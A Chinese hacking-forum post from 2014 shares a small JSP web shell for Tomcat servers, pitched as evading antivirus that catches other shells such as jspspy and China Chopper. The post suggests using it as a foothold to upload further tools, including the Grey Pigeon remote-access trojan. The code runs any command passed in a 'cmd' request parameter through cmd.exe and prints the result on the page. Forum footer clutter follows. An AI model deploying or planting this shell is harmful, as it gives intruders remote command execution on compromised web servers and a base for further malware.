|
|
各位基友是否遇到有的站需要登录才能访问本站的jsp文件,或者说tomcat传各种马子被杀!比如、(jspspy,菜刀一句话现在都有杀软或者防火墙杀),然后纯文件管理的马子又来函数禁用!
那么这时候可以使用这个马子,这样下载文件上传文件我们借助第三方的exe可以达到文件管理效果!丢个灰鸽子啥都,,,哈哈哈!
下面给大家一个jsp执行dos命令的马子!这东西不能称之为马子,所以,免杀必然就自然啦!
至于想达到文件管理下载文件之类的, 大家上一个 AIO之类的东西轻松搞定!
- <%@ page contentType="text/html; charset=gb2312"%>
- <%@ page import="java.io.*"%>
- <%
- String cmd = request.getParameter("cmd");
- String output = "";
-
- if(cmd != null) {
- String s = null;
- try {
- Process p = Runtime.getRuntime().exec("cmd.exe /C " + cmd);
- BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
- while((s = sI.readLine()) != null) {
- output += s;
- }
- }
- catch(IOException e) {
- e.printStackTrace();
- }
- }
- %>
- <form method="post" action’’>
- <input name='cmd' type=text>
- <input type=submit value='Run'>
- </form>
- <textarea name="hack" rows="20" cols="70">
- <%=output%>
- </textarea>
|
|
|小黑屋|手机版|中国白客联盟-BUC
( 赣ICP备15007148号-6 ) 
窥视卡
雷达卡
发表于 2014-8-31 08:26:45
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
显身卡